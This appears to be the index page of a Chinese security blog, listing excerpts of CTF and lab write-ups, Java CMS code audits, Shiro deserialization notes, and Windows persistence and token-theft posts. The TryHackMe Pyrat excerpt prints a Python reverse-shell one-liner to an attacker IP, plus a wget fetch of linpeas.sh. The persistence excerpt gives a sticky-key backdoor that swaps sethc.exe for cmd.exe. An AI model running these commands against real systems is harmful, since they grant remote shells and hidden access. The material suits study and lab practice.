晴川's Blog🌈

XXE小思路前言最近碰到一个xxe的题，某大佬出的xxe的java题，一个骚思路 ##思路学习过程 部分关键代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041@PostMapping(value = "/import/xml", produces = MediaType.TEXT_HTML_VALUE) public String importXml(@RequestParam("xml") String xml, Model model) throws Exception { if (xml != null && xml.length() > 10000) { xml = xml.substring(0, 10000); } boolean enable = xml != null && xml.contains( ...

JFinal代码审计小记项目简介jfinal cms是一个java开发的功能强大的信息咨询网站，采用了简洁强大的JFinal作为web框架，模板引擎用的是beetl，数据库用mysql，前端bootstrap框架。 项目地址：https://github.com/jflyfox/jfinal_cms/releases/tag/v5.1.0 环境搭建下载源码，用idea打开 小皮启动数据库，将相关sql文件jfinal_cms_v4.sql导入数据库中 在sql文件中前面加入 1create database jfinal_cms; / use jfinal_cms; 选用tomcat启动 源码分析白盒+黑盒进行测试 看到这种论坛类的，我直接就是想到xss 先测测xss XSS1登录处注册邮箱抓包修改邮箱可造成xss 修改 然后就会得到 分析一下代码是怎么处理的 RegistController类会进行处理相应的html文件 相应的html文件中调用oper_save方法 同类save方法中写了对email的处理 通过审计发现他后端只会检验邮箱是否为空和带不带@，也就是 ...

Jrecms代码审计小计项目简介JreCms是开源免费的JAVA企业网站开发建设管理系统 软件架构 MVC:JFinal 页面:enjoy 缓存:ehcache 数据库:Mysql 项目地址：https://gitee.com/heyewei/JFinalcms 环境搭建下载源码后，创建数据表cms,导入相应sql文件 IDA打开源码可自动加载包 源码分析XSS-反射在com/cms/controller/admin/LoginController.java#index()里，用JFinal的getPara获取的数据被交给render渲染前端页面。 而前端用的是用来接收页面传来的参数 xss-存储型前台留言功能 找到留言功能的控制器com/cms/controller/front/GuestbookController.java#save()，这里使用了JFinal框架的getModel将接收的表单传递给Guestbook对象，且没有做任何过滤。 可以看到传入参数没有过滤 继续跟进 可以看到这 ...

IDA+MCP解CTF题尝试一、cursor准备下载配置cursor 上述配置放到cursor中 这里我用的cursor，就没用其他平台的api-key了 二、配置ida-mcp下载解压ida pro（别的师傅的链接） 123通过网盘分享的文件：IDA Professional 9.1.7z链接: https://pan.baidu.com/s/11XkBzv_PHWGzWGXjSqWWQg?pwd=Alex 提取码: Alex --来自百度网盘超级会员v2的分享 进入python311目录并打开终端 安装MCP 项目地址：https://github.com/mrexodia/ida-pro-mcp 1python.exe -m pip install --upgrade git+https://github.com/mrexodia/ida-pro-mcp 123"E:\IDA Professional 9.1\python311\Scripts\ida-pro-mcp.exe" --install"E:\IDA Professional 9. ...

Shiro反序列化漏洞-无依赖版利用链前面学漏洞利用的时候我们添加了cc依赖，而shiro本身又是有cc依赖的，我们现在将添加的cc依赖删除掉，来学习一下无cc依赖的shiro反序列化利用链 主要是针对commons-beanutils，cb链主要是对Javabean类的一个增强，而cc是对Java集合类的一个增强 测试例子 123456789101112131415161718192021222324252627282930313233343536373839public class Person { // 私有成员变量 private String name; private int age; // 无参构造方法 public Person() { } // 带参构造方法 public Person(String name, int age) { this.name = name; this.age = age; } // Getter 方法 ...

Shiro反序列化漏洞-Shiro550前言Shiro 550 反序列化漏洞存在版本：shiro <1.2.4，产生原因是因为shiro接受了Cookie里面rememberMe的值，然后去进行Base64解密后，再使用aes密钥解密后的数据，进行反序列化。 加密的过程是：用户信息=>序列化=>AES加密（这一步需要用密钥key）=>base64编码=>添加到RememberMe Cookie字段。勾选记住密码之后，下次登录时，服务端会根据客户端请求包中的cookie值进行身份验证，无需登录即可访问。那么显然，服务端进行对cookie进行验证的步骤就是：取出请求包中rememberMe的cookie值 => Base64解码=>AES解密（用到密钥key）=>反序列化。 环境搭建github下载 123git clone https://github.com/apache/shiro.gitcd shiro git checkout shiro-root-1.2.4 ...

TryHackMe-Silver Platter1nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm 发现80和8080端口 8080端口扫描发现跳转 80端口concat路由发现scr1ptkiddy 结合题目名称，在网上搜到一个cms， 参考这个链接进行身份验证绕过，因为我们已经有一个用户名了，所以我们可以尝试无密码登陆 https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d 删除密码字段后成功登陆 123456789101112131415GET /silverpeas/look/jsp/MainFrame.jsp HTTP/1.1Host: 10.10.30.137:8080Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb ...

TryHackMe-Pyrat1nmap -sC -sV -oN 1.txt 10.10.182.195 扫到8000端口，访问发现提示 Try a more basic connection 啥？更基础的连接，怎么链接，nc 尝试nc 执行反弹shell命令 1import socket,os,pty;s=socket.socket();s.connect(("10.23.102.205",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh") 过来的是sh，换成交互式shell 1python3 -c 'import pty; pty.spawn("/bin/bash")' 翻了一遍，发现home文件下有个think，但是没权限读，用linpeas.sh 123cd /tmpwget http://10.23.102.205:8080/linpeas.shchmod ...

内网渗透-权限维持前言平常打靶场遇见的大多都是权限提升的情况，很少遇见需要权限维持的情况，但是这作为内网渗透中蛮重要的一个模块，我就这我的经验和想法，以及一些在网上搜集到的方法来写一下，可能有些想法是我认为可以做权限维持的，如有错误，欢迎指正。 权限维持，主要是应对拿下了一个目标的权限，常见思路是建立一个后门来对目标进行持续控制，以防一旦漏洞被修复后，无法继续控制目标 Windows权限维持粘滞键后门5次shift可以打开或关闭粘滞键，粘滞键是为了实现组合键的功能，方便用户只按一个键 在c:\windows\system32下有sethc.exe 本来这是用来提权的（参考春秋云镜-privilege），但是想到他是更改粘滞键，平常用的人应该不多很少发现，更改5次shift执行的程序，就想着这也算是个后门吧，算是维持了？ 12ren C://windows/system32/sethc.exe C://windows/system32/sethc.bakren C://windows/system32/cmd.exe C://windows/system32/sethc.exe ...

内网渗透-令牌窃取前言本来应该早些写的，但想来想去令牌窃取没太多东西，就慢慢给忘了，今天来补一下。 令牌窃取主要就是用msf、cs还有incognito.exe 令牌令牌是系统的临时密钥，相当于账号和密码，用来决定是否允许此次请求和判断是属于哪一个用户的。它允许用户在不提供密码或者其他凭证的前提下，访问网络和资源。这些令牌将持续存在于系统之中，除非系统重新启动。令牌最大的特点是随机性、不可预测，黑客和软件均无法猜测出令牌。 令牌的种类有很多，如： （1）访问令牌(Access Tokem)：表示访问控制操作系统的对象。 （2）会话令牌(Session Token)：是交互会话中唯一身份标识符。 （3）密保令牌(Scecurity Token)：又称认证令牌或硬件令牌，是一种计算机身份检验的物理设备。 Windows的Access Token也有两种类型，如： （1）授权令牌(Delegation Tokens)：它支持交互式登录，例如远程桌面、用户桌面访问。 （2）模拟令牌(Impersonation Tokens)：它支持非交互式的绘画，例如访问目标共享文件。 两种令牌会在系统重启后 ...